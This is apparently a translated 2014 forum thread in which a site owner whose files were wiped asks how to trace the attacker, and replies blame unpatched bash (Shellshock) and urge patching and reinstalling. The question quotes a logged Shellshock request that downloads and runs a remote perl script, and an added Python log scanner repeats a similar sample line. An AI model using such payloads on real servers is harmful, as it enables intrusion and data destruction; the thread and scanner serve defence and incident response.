Information Security
Alexnn, 2014-12-05 10:49:55

How to find and punish a hacker?

One of my sites is gone. More precisely, the httpdocs and httpsdocs directories turned out to be empty. Access logs showed that the site began to generate a 404 error after such a request:
89.248.172.175 - - [28/Nov/2014:19:29:57 +0100] "GET /phppath/cgi_wrapper HTTP /1.1" 200 174 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\" ;system(\"cd /tmp;wget -q 82.165.135.9/android.txt;perl android.txt;rm -rf android*\");'"
89.248.172.175 - provider found, email sent to abuse mailbox.
File 82.165.135.9/android.txt - saved
82.165.135.9 - provider notified
What else can I do?

5 answer(s)
Vadim Misbakh-Soloviev, 2014-12-05
@mva

I would also advise:
1) do not call hackers (and even more so script kiddies) hackers indiscriminately
2) understand that the fault lies with you, and not with him
3) understand why he did it: to show you the vulnerability that you preferred to ignore

Vlad Zhivotnev, 2014-12-05
@inkvizitor68sl

Shellshock.
bash needs to be updated, my friend.
And at that IP address, most likely, lives a home user with a virus who has never heard such words.
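
As an added example (not part of the original thread): a scan of combined-format access logs for the Shellshock signature carried by the request in the question, a bash function definition `() {` inside a header value. The function name, the documentation-range IP addresses and the sample log lines are constructed for illustration.

```python
import re

# Apache "combined" log line; quoted fields may contain backslash-escaped quotes.
Q = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + Q + r' (\d{3}) \S+ ' + Q + ' ' + Q)
# Bash function-definition prefix "() {" that Shellshock requests put in a header.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')

# Constructed sample lines (documentation-range addresses), not taken from the thread.
SAMPLE_LOG = [
    r'198.51.100.7 - - [28/Nov/2014:19:29:50 +0100] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    r'192.0.2.44 - - [28/Nov/2014:19:29:57 +0100] "GET /cgi-bin/status HTTP/1.1" 200 174 "-" "() { :;}; /bin/sh -c \"wget -q 203.0.113.9/sample.txt\""',
    r'198.51.100.7 - - [28/Nov/2014:19:30:05 +0100] "GET /index.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

def find_shellshock(lines):
    """Return one record per log line whose request, referer or user-agent
    contains the Shellshock prefix, with the hosts named inside the payload."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        ip, when, request, status, referer, agent = m.groups()
        fields = {"request": request, "referer": referer, "agent": agent}
        tainted = [name for name, value in fields.items() if SHELLSHOCK_RE.search(value)]
        if not tainted:
            continue
        # Addresses inside the payload are second-stage hosts worth reporting too.
        hosts = sorted({h for name in tainted for h in IPV4_RE.findall(fields[name])})
        hits.append({
            "line": number,
            "source_ip": ip,
            "time": when,
            "status": int(status),
            "fields": tainted,
            "payload_hosts": hosts,
        })
    return hits

if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged line, as in the question's log, means the CGI endpoint answered the request, so that host is the one to examine first; `source_ip` and `payload_hosts` are the addresses to report to their providers' abuse contacts.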

Armenian Radio, 2014-12-05
@gbg

  1. Take a snapshot of a disk
  2. Format all partitions
  3. Reinstall OS
  4. Restore site from backup
  5. Fix the hole
  6. Back to work

Sergey Petrikov, 2014-12-05
@RicoX

1) Complete formatting of the server with reinstalling everything from scratch.
2) Dismiss / fine your incompetent admin, who neglected the old vulnerability and server updates.
3) Learn a lesson about basic server security and hire a competent specialist to maintain it.
There is no way to find him; most likely all actions were performed through the site of a similarly lazy, clumsy admin, which was hacked before yours, since the IP belongs to a Dutch hosting provider and not to an Internet provider. It also looks like the vulnerability was exploited by a primitive bot rather than a human, but more data is needed to confirm this for sure.

Puma Thailand, 2014-12-05
@opium

Go to the police. If the person did not hide very well, they will find and punish him; if he has any brains, then all the IPs are anonymous and you will not find any leads.
